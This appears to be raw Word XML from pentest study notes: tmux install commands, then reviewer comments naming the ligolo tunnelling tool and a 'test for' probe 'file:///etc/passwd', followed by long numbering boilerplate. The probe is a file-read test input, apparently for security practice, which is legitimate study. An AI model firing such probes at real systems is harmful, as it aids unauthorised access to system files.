    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1397"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Arch Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1397"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo pacman -S tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1397"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For FreeBSD:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1397"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pkg install tmux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C51">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1397"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux -V</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C53">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1397"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify that you successfully installed</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId1389" w:type="default"/>
      <w:footerReference r:id="rId1390"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hael" w:id="0" w:date="2025-08-12T16:23:42Z">
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003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already have the proxy and 64-bit versions of agent in ~/Downloads/ligolo</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:author="Michael" w:id="1" w:date="2024-11-20T22:14:38Z">
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003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are on linux, test for:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003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3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file:///etc/passwd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 w:name="Calibri"/>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C5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C5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rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:b w:val="1"/>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rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>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7">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0">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5">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2">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>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2">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6">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8">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>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8">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7">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8">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7">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8">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6">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0">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9">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>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5">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4">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6">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>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 w:numId="837">
    <w:abstractNumId w:val="837"/>
  </w:num>
  <w:num w:numId="838">
    <w:abstractNumId w:val="838"/>
  </w:num>
  <w:num w:numId="839">
    <w:abstractNumId w:val="839"/>
  </w:num>
  <w:num w:numId="840">
    <w:abstractNumId w:val="840"/>
  </w:num>
  <w:num w:numId="841">
    <w:abstractNumId w:val="841"/>
  </w:num>
  <w:num w:numId="842">
    <w:abstractNumId w:val="842"/>
  </w:num>
  <w:num w:numId="843">
    <w:abstractNumId w:val="843"/>
  </w:num>
  <w:num w:numId="844">
    <w:abstractNumId w:val="844"/>
  </w:num>
  <w:num w:numId="845">
    <w:abstractNumId w:val="845"/>
  </w:num>
  <w:num w:numId="846">
    <w:abstractNumId w:val="846"/>
  </w:num>
  <w:num w:numId="847">
    <w:abstractNumId w:val="847"/>
  </w:num>
  <w:num w:numId="848">
    <w:abstractNumId w:val="848"/>
  </w:num>
  <w:num w:numId="849">
    <w:abstractNumId w:val="849"/>
  </w:num>
  <w:num w:numId="850">
    <w:abstractNumId w:val="850"/>
  </w:num>
  <w:num w:numId="851">
    <w:abstractNumId w:val="851"/>
  </w:num>
  <w:num w:numId="852">
    <w:abstractNumId w:val="852"/>
  </w:num>
  <w:num w:numId="853">
    <w:abstractNumId w:val="853"/>
  </w:num>
  <w:num w:numId="854">
    <w:abstractNumId w:val="854"/>
  </w:num>
  <w:num w:numId="855">
    <w:abstractNumId w:val="855"/>
  </w:num>
  <w:num w:numId="856">
    <w:abstractNumId w:val="856"/>
  </w:num>
  <w:num w:numId="857">
    <w:abstractNumId w:val="857"/>
  </w:num>
  <w:num w:numId="858">
    <w:abstractNumId w:val="858"/>
  </w:num>
  <w:num w:numId="859">
    <w:abstractNumId w:val="859"/>
  </w:num>
  <w:num w:numId="860">
    <w:abstractNumId w:val="860"/>
  </w:num>
  <w:num w:numId="861">
    <w:abstractNumId w:val="861"/>
  </w:num>
  <w:num w:numId="862">
    <w:abstractNumId w:val="862"/>
  </w:num>
  <w:num w:numId="863">
    <w:abstractNumId w:val="863"/>
  </w:num>
  <w:num w:numId="864">
    <w:abstractNumId w:val="864"/>
  </w:num>
  <w:num w:numId="865">
    <w:abstractNumId w:val="865"/>
  </w:num>
  <w:num w:numId="866">
    <w:abstractNumId w:val="866"/>
  </w:num>
  <w:num w:numId="867">
    <w:abstractNumId w:val="867"/>
  </w:num>
  <w:num w:numId="868">
    <w:abstractNumId w:val="868"/>
  </w:num>
  <w:num w:numId="869">
    <w:abstractNumId w:val="869"/>
  </w:num>
  <w:num w:numId="870">
    <w:abstractNumId w:val="870"/>
  </w:num>
  <w:num w:numId="871">
    <w:abstractNumId w:val="871"/>
  </w:num>
  <w:num w:numId="872">
    <w:abstractNumId w:val="872"/>
  </w:num>
  <w:num w:numId="873">
    <w:abstractNumId w:val="873"/>
  </w:num>
  <w:num w:numId="874">
    <w:abstractNumId w:val="874"/>
  </w:num>
  <w:num w:numId="875">
    <w:abstractNumId w:val="875"/>
  </w:num>
  <w:num w:numId="876">
    <w:abstractNumId w:val="876"/>
  </w:num>
  <w:num w:numId="877">
    <w:abstractNumId w:val="877"/>
  </w:num>
  <w:num w:numId="878">
    <w:abstractNumId w:val="878"/>
  </w:num>
  <w:num w:numId="879">
    <w:abstractNumId w:val="879"/>
  </w:num>
  <w:num w:numId="880">
    <w:abstractNumId w:val="880"/>
  </w:num>
  <w:num w:numId="881">
    <w:abstractNumId w:val="881"/>
  </w:num>
  <w:num w:numId="882">
    <w:abstractNumId w:val="882"/>
  </w:num>
  <w:num w:numId="883">
    <w:abstractNumId w:val="883"/>
  </w:num>
  <w:num w:numId="884">
    <w:abstractNumId w:val="884"/>
  </w:num>
  <w:num w:numId="885">
    <w:abstractNumId w:val="885"/>
  </w:num>
  <w:num w:numId="886">
    <w:abstractNumId w:val="886"/>
  </w:num>
  <w:num w:numId="887">
    <w:abstractNumId w:val="887"/>
  </w:num>
  <w:num w:numId="888">
    <w:abstractNumId w:val="888"/>
  </w:num>
  <w:num w:numId="889">
    <w:abstractNumId w:val="889"/>
  </w:num>
  <w:num w:numId="890">
    <w:abstractNumId w:val="890"/>
  </w:num>
  <w:num w:numId="891">
    <w:abstractNumId w:val="891"/>
  </w:num>
  <w:num w:numId="892">
    <w:abstractNumId w:val="892"/>
  </w:num>
  <w:num w:numId="893">
    <w:abstractNumId w:val="893"/>
  </w:num>
  <w:num w:numId="894">
    <w:abstractNumId w:val="894"/>
  </w:num>
  <w:num w:numId="895">
    <w:abstractNumId w:val="895"/>
  </w:num>
  <w:num w:numId="896">
    <w:abstractNumId w:val="896"/>
  </w:num>
  <w:num w:numId="897">
    <w:abstractNumId w:val="897"/>
  </w:num>
  <w:num w:numId="898">
    <w:abstractNumId w:val="898"/>
  </w:num>
  <w:num w:numId="899">
    <w:abstractNumId w:val="899"/>
  </w:num>
  <w:num w:numId="900">
    <w:abstractNumId w:val="900"/>
  </w:num>
  <w:num w:numId="901">
    <w:abstractNumId w:val="901"/>
  </w:num>
  <w:num w:numId="902">
    <w:abstractNumId w:val="902"/>
  </w:num>
  <w:num w:numId="903">
    <w:abstractNumId w:val="903"/>
  </w:num>
  <w:num w:numId="904">
    <w:abstractNumId w:val="904"/>
  </w:num>
  <w:num w:numId="905">
    <w:abstractNumId w:val="905"/>
  </w:num>
  <w:num w:numId="906">
    <w:abstractNumId w:val="906"/>
  </w:num>
  <w:num w:numId="907">
    <w:abstractNumId w:val="907"/>
  </w:num>
  <w:num w:numId="908">
    <w:abstractNumId w:val="908"/>
  </w:num>
  <w:num w:numId="909">
    <w:abstractNumId w:val="909"/>
  </w:num>
  <w:num w:numId="910">
    <w:abstractNumId w:val="910"/>
  </w:num>
  <w:num w:numId="911">
    <w:abstractNumId w:val="911"/>
  </w:num>
  <w:num w:numId="912">
    <w:abstractNumId w:val="912"/>
  </w:num>
  <w:num w:numId="913">
    <w:abstractNumId w:val="913"/>
  </w:num>
  <w:num w:numId="914">
    <w:abstractNumId w:val="914"/>
  </w:num>
  <w:num w:numId="915">
    <w:abstractNumId w:val="915"/>
  </w:num>
  <w:num w:numId="916">
    <w:abstractNumId w:val="916"/>
  </w:num>
  <w:num w:numId="917">
    <w:abstractNumId w:val="917"/>
  </w:num>
  <w:num w:numId="918">
    <w:abstractNumId w:val="918"/>
  </w:num>
  <w:num w:numId="919">
    <w:abstractNumId w:val="919"/>
  </w:num>
  <w:num w:numId="920">
    <w:abstractNumId w:val="920"/>
  </w:num>
  <w:num w:numId="921">
    <w:abstractNumId w:val="921"/>
  </w:num>
  <w:num w:numId="922">
    <w:abstractNumId w:val="922"/>
  </w:num>
  <w:num w:numId="923">
    <w:abstractNumId w:val="923"/>
  </w:num>
  <w:num w:numId="924">
    <w:abstractNumId w:val="924"/>
  </w:num>
  <w:num w:numId="925">
    <w:abstractNumId w:val="925"/>
  </w:num>
  <w:num w:numId="926">
    <w:abstractNumId w:val="926"/>
  </w:num>
  <w:num w:numId="927">
    <w:abstractNumId w:val="927"/>
  </w:num>
  <w:num w:numId="928">
    <w:abstractNumId w:val="928"/>
  </w:num>
  <w:num w:numId="929">
    <w:abstractNumId w:val="929"/>
  </w:num>
  <w:num w:numId="930">
    <w:abstractNumId w:val="930"/>
  </w:num>
  <w:num w:numId="931">
    <w:abstractNumId w:val="931"/>
  </w:num>
  <w:num w:numId="932">
    <w:abstractNumId w:val="932"/>
  </w:num>
  <w:num w:numId="933">
    <w:abstractNumId w:val="933"/>
  </w:num>
  <w:num w:numId="934">
    <w:abstractNumId w:val="934"/>
  </w:num>
  <w:num w:numId="935">
    <w:abstractNumId w:val="935"/>
  </w:num>
  <w:num w:numId="936">
    <w:abstractNumId w:val="936"/>
  </w:num>
  <w:num w:numId="937">
    <w:abstractNumId w:val="937"/>
  </w:num>
  <w:num w:numId="938">
    <w:abstractNumId w:val="938"/>
  </w:num>
  <w:num w:numId="939">
    <w:abstractNumId w:val="939"/>
  </w:num>
  <w:num w:numId="940">
    <w:abstractNumId w:val="940"/>
  </w:num>
  <w:num w:numId="941">
    <w:abstractNumId w:val="941"/>
  </w:num>
  <w:num w:numId="942">
    <w:abstractNumId w:val="942"/>
  </w:num>
  <w:num w:numId="943">
    <w:abstractNumId w:val="943"/>
  </w:num>
  <w:num w:numId="944">
    <w:abstractNumId w:val="944"/>
  </w:num>
  <w:num w:numId="945">
    <w:abstractNumId w:val="945"/>
  </w:num>
  <w:num w:numId="946">
    <w:abstractNumId w:val="946"/>
  </w:num>
  <w:num w:numId="947">
    <w:abstractNumId w:val="947"/>
  </w:num>
  <w:num w:numId="948">
    <w:abstractNumId w:val="948"/>
  </w:num>
  <w:num w:numId="949">
    <w:abstractNumId w:val="949"/>
  </w:num>
  <w:num w:numId="950">
    <w:abstractNumId w:val="950"/>
  </w:num>
  <w:num w:numId="951">
    <w:abstractNumId w:val="951"/>
  </w:num>
  <w:num w:numId="952">
    <w:abstractNumId w:val="952"/>
  </w:num>
  <w:num w:numId="953">
    <w:abstractNumId w:val="953"/>
  </w:num>
  <w:num w:numId="954">
    <w:abstractNumId w:val="954"/>
  </w:num>
  <w:num w:numId="955">
    <w:abstractNumId w:val="955"/>
  </w:num>
  <w:num w:numId="956">
    <w:abstractNumId w:val="956"/>
  </w:num>
  <w:num w:numId="957">
    <w:abstractNumId w:val="957"/>
  </w:num>
  <w:num w:numId="958">
    <w:abstractNumId w:val="958"/>
  </w:num>
  <w:num w:numId="959">
    <w:abstractNumId w:val="959"/>
  </w:num>
  <w:num w:numId="960">
    <w:abstractNumId w:val="960"/>
  </w:num>
  <w:num w:numId="961">
    <w:abstractNumId w:val="961"/>
  </w:num>
  <w:num w:numId="962">
    <w:abstractNumId w:val="962"/>
  </w:num>
  <w:num w:numId="963">
    <w:abstractNumId w:val="963"/>
  </w:num>
  <w:num w:numId="964">
    <w:abstractNumId w:val="964"/>
  </w:num>
  <w:num w:numId="965">
    <w:abstractNumId w:val="965"/>
  </w:num>
  <w:num w:numId="966">
    <w:abstractNumId w:val="966"/>
  </w:num>
  <w:num w:numId="967">
    <w:abstractNumId w:val="967"/>
  </w:num>
  <w:num w:numId="968">
    <w:abstractNumId w:val="968"/>
  </w:num>
  <w:num w:numId="969">
    <w:abstractNumId w:val="969"/>
  </w:num>
  <w:num w:numId="970">
    <w:abstractNumId w:val="970"/>
  </w:num>
  <w:num w:numId="971">
    <w:abstractNumId w:val="971"/>
  </w:num>
  <w:num w:numId="972">
    <w:abstractNumId w:val="972"/>
  </w:num>
  <w:num w:numId="973">
    <w:abstractNumId w:val="973"/>
  </w:num>
  <w:num w:numId="974">
    <w:abstractNumId w:val="974"/>
  </w:num>
  <w:num w:numId="975">
    <w:abstractNumId w:val="975"/>
  </w:num>
  <w:num w:numId="976">
    <w:abstractNumId w:val="976"/>
  </w:num>
  <w:num w:numId="977">
    <w:abstractNumId w:val="977"/>
  </w:num>
  <w:num w:numId="978">
    <w:abstractNumId w:val="978"/>
  </w:num>
  <w:num w:numId="979">
    <w:abstractNumId w:val="979"/>
  </w:num>
  <w:num w:numId="980">
    <w:abstractNumId w:val="980"/>
  </w:num>
  <w:num w:numId="981">
    <w:abstractNumId w:val="981"/>
  </w:num>
  <w:num w:numId="982">
    <w:abstractNumId w:val="982"/>
  </w:num>
  <w:num w:numId="983">
    <w:abstractNumId w:val="983"/>
  </w:num>
  <w:num w:numId="984">
    <w:abstractNumId w:val="984"/>
  </w:num>
  <w:num w:numId="985">
    <w:abstractNumId w:val="985"/>
  </w:num>
  <w:num w:numId="986">
    <w:abstractNumId w:val="986"/>
  </w:num>
  <w:num w:numId="987">
    <w:abstractNumId w:val="987"/>
  </w:num>
  <w:num w:numId="988">
    <w:abstractNumId w:val="988"/>
  </w:num>
  <w:num w:numId="989">
    <w:abstractNumId w:val="989"/>
  </w:num>
  <w:num w:numId="990">
    <w:abstractNumId w:val="990"/>
  </w:num>
  <w:num w:numId="991">
    <w:abstractNumId w:val="991"/>
  </w:num>
  <w:num w:numId="992">
    <w:abstractNumId w:val="992"/>
  </w:num>
  <w:num w:numId="993">
    <w:abstractNumId w:val="993"/>
  </w:num>
  <w:num w:numId="994">
    <w:abstractNumId w:val="994"/>
  </w:num>
  <w:num w:numId="995">
    <w:abstractNumId w:val="995"/>
  </w:num>
  <w:num w:numId="996">
    <w:abstractNumId w:val="996"/>
  </w:num>
  <w:num w:numId="997">
    <w:abstractNumId w:val="997"/>
  </w:num>
  <w:num w:numId="998">
    <w:abstractNumId w:val="998"/>
  </w:num>
  <w:num w:numId="999">
    <w:abstractNumId w:val="999"/>
  </w:num>
  <w:num w:numId="1000">
    <w:abstractNumId w:val="1000"/>
  </w:num>
  <w:num w:numId="1001">
    <w:abstractNumId w:val="1001"/>
  </w:num>
  <w:num w:numId="1002">
    <w:abstractNumId w:val="1002"/>
  </w:num>
  <w:num w:numId="1003">
    <w:abstractNumId w:val="1003"/>
  </w:num>
  <w:num w:numId="1004">
    <w:abstractNumId w:val="1004"/>
  </w:num>
  <w:num w:numId="1005">
    <w:abstractNumId w:val="1005"/>
  </w:num>
  <w:num w:numId="1006">
    <w:abstractNumId w:val="1006"/>
  </w:num>
  <w:num w:numId="1007">
    <w:abstractNumId w:val="1007"/>
  </w:num>
  <w:num w:numId="1008">
    <w:abstractNumId w:val="1008"/>
  </w:num>
  <w:num w:numId="1009">
    <w:abstractNumId w:val="1009"/>
  </w:num>
  <w:num w:numId="1010">
    <w:abstractNumId w:val="1010"/>
  </w:num>
  <w:num w:numId="1011">
    <w:abstractNumId w:val="1011"/>
  </w:num>
  <w:num w:numId="1012">
    <w:abstractNumId w:val="1012"/>
  </w:num>
  <w:num w:numId="1013">
    <w:abstractNumId w:val="1013"/>
  </w:num>
  <w:num w:numId="1014">
    <w:abstractNumId w:val="1014"/>
  </w:num>
  <w:num w:numId="1015">
    <w:abstractNumId w:val="1015"/>
  </w:num>
  <w:num w:numId="1016">
    <w:abstractNumId w:val="1016"/>
  </w:num>
  <w:num w:numId="1017">
    <w:abstractNumId w:val="1017"/>
  </w:num>
  <w:num w:numId="1018">
    <w:abstractNumId w:val="1018"/>
  </w:num>
  <w:num w:numId="1019">
    <w:abstractNumId w:val="1019"/>
  </w:num>
  <w:num w:numId="1020">
    <w:abstractNumId w:val="1020"/>
  </w:num>
  <w:num w:numId="1021">
    <w:abstractNumId w:val="1021"/>
  </w:num>
  <w:num w:numId="1022">
    <w:abstractNumId w:val="1022"/>
  </w:num>
  <w:num w:numId="1023">
    <w:abstractNumId w:val="1023"/>
  </w:num>
  <w:num w:numId="1024">
    <w:abstractNumId w:val="1024"/>
  </w:num>
  <w:num w:numId="1025">
    <w:abstractNumId w:val="1025"/>
  </w:num>
  <w:num w:numId="1026">
    <w:abstractNumId w:val="1026"/>
  </w:num>
  <w:num w:numId="1027">
    <w:abstractNumId w:val="1027"/>
  </w:num>
  <w:num w:numId="1028">
    <w:abstractNumId w:val="1028"/>
  </w:num>
  <w:num w:numId="1029">
    <w:abstractNumId w:val="1029"/>
  </w:num>
  <w:num w:numId="1030">
    <w:abstractNumId w:val="1030"/>
  </w:num>
  <w:num w:numId="1031">
    <w:abstractNumId w:val="1031"/>
  </w:num>
  <w:num w:numId="1032">
    <w:abstractNumId w:val="1032"/>
  </w:num>
  <w:num w:numId="1033">
    <w:abstractNumId w:val="1033"/>
  </w:num>
  <w:num w:numId="1034">
    <w:abstractNumId w:val="1034"/>
  </w:num>
  <w:num w:numId="1035">
    <w:abstractNumId w:val="1035"/>
  </w:num>
  <w:num w:numId="1036">
    <w:abstractNumId w:val="1036"/>
  </w:num>
  <w:num w:numId="1037">
    <w:abstractNumId w:val="1037"/>
  </w:num>
  <w:num w:numId="1038">
    <w:abstractNumId w:val="1038"/>
  </w:num>
  <w:num w:numId="1039">
    <w:abstractNumId w:val="1039"/>
  </w:num>
  <w:num w:numId="1040">
    <w:abstractNumId w:val="1040"/>
  </w:num>
  <w:num w:numId="1041">
    <w:abstractNumId w:val="1041"/>
  </w:num>
  <w:num w:numId="1042">
    <w:abstractNumId w:val="1042"/>
  </w:num>
  <w:num w:numId="1043">
    <w:abstractNumId w:val="1043"/>
  </w:num>
  <w:num w:numId="1044">
    <w:abstractNumId w:val="1044"/>
  </w:num>
  <w:num w:numId="1045">
    <w:abstractNumId w:val="1045"/>
  </w:num>
  <w:num w:numId="1046">
    <w:abstractNumId w:val="1046"/>
  </w:num>
  <w:num w:numId="1047">
    <w:abstractNumId w:val="1047"/>
  </w:num>
  <w:num w:numId="1048">
    <w:abstractNumId w:val="1048"/>
  </w:num>
  <w:num w:numId="1049">
    <w:abstractNumId w:val="1049"/>
  </w:num>
  <w:num w:numId="1050">
    <w:abstractNumId w:val="1050"/>
  </w:num>
  <w:num w:numId="1051">
    <w:abstractNumId w:val="1051"/>
  </w:num>
  <w:num w:numId="1052">
    <w:abstractNumId w:val="1052"/>
  </w:num>
  <w:num w:numId="1053">
    <w:abstractNumId w:val="1053"/>
  </w:num>
  <w:num w:numId="1054">
    <w:abstractNumId w:val="1054"/>
  </w:num>
  <w:num w:numId="1055">
    <w:abstractNumId w:val="1055"/>
  </w:num>
  <w:num w:numId="1056">
    <w:abstractNumId w:val="1056"/>
  </w:num>
  <w:num w:numId="1057">
    <w:abstractNumId w:val="1057"/>
  </w:num>
  <w:num w:numId="1058">
    <w:abstractNumId w:val="1058"/>
  </w:num>
  <w:num w:numId="1059">
    <w:abstractNumId w:val="1059"/>
  </w:num>
  <w:num w:numId="1060">
    <w:abstractNumId w:val="1060"/>
  </w:num>
  <w:num w:numId="1061">
    <w:abstractNumId w:val="1061"/>
  </w:num>
  <w:num w:numId="1062">
    <w:abstractNumId w:val="1062"/>
  </w:num>
  <w:num w:numId="1063">
    <w:abstractNumId w:val="1063"/>
  </w:num>
  <w:num w:numId="1064">
    <w:abstractNumId w:val="1064"/>
  </w:num>
  <w:num w:numId="1065">
    <w:abstractNumId w:val="1065"/>
  </w:num>
  <w:num w:numId="1066">
    <w:abstractNumId w:val="1066"/>
  </w:num>
  <w:num w:numId="1067">
    <w:abstractNumId w:val="1067"/>
  </w:num>
  <w:num w:numId="1068">
    <w:abstractNumId w:val="1068"/>
  </w:num>
  <w:num w:numId="1069">
    <w:abstractNumId w:val="1069"/>
  </w:num>
  <w:num w:numId="1070">
    <w:abstractNumId w:val="1070"/>
  </w:num>
  <w:num w:numId="1071">
    <w:abstractNumId w:val="1071"/>
  </w:num>
  <w:num w:numId="1072">
    <w:abstractNumId w:val="1072"/>
  </w:num>
  <w:num w:numId="1073">
    <w:abstractNumId w:val="1073"/>
  </w:num>
  <w:num w:numId="1074">
    <w:abstractNumId w:val="1074"/>
  </w:num>
  <w:num w:numId="1075">
    <w:abstractNumId w:val="1075"/>
  </w:num>
  <w:num w:numId="1076">
    <w:abstractNumId w:val="1076"/>
  </w:num>
  <w:num w:numId="1077">
    <w:abstractNumId w:val="1077"/>
  </w:num>
  <w:num w:numId="1078">
    <w:abstractNumId w:val="1078"/>
  </w:num>
  <w:num w:numId="1079">
    <w:abstractNumId w:val="1079"/>
  </w:num>
  <w:num w:numId="1080">
    <w:abstractNumId w:val="1080"/>
  </w:num>
  <w:num w:numId="1081">
    <w:abstractNumId w:val="1081"/>
  </w:num>
  <w:num w:numId="1082">
    <w:abstractNumId w:val="1082"/>
  </w:num>
  <w:num w:numId="1083">
    <w:abstractNumId w:val="1083"/>
  </w:num>
  <w:num w:numId="1084">
    <w:abstractNumId w:val="1084"/>
  </w:num>
  <w:num w:numId="1085">
    <w:abstractNumId w:val="1085"/>
  </w:num>
  <w:num w:numId="1086">
    <w:abstractNumId w:val="1086"/>
  </w:num>
  <w:num w:numId="1087">
    <w:abstractNumId w:val="1087"/>
  </w:num>
  <w:num w:numId="1088">
    <w:abstractNumId w:val="1088"/>
  </w:num>
  <w:num w:numId="1089">
    <w:abstractNumId w:val="1089"/>
  </w:num>
  <w:num w:numId="1090">
    <w:abstractNumId w:val="1090"/>
  </w:num>
  <w:num w:numId="1091">
    <w:abstractNumId w:val="1091"/>
  </w:num>
  <w:num w:numId="1092">
    <w:abstractNumId w:val="1092"/>
  </w:num>
  <w:num w:numId="1093">
    <w:abstractNumId w:val="1093"/>
  </w:num>
  <w:num w:numId="1094">
    <w:abstractNumId w:val="1094"/>
  </w:num>
  <w:num w:numId="1095">
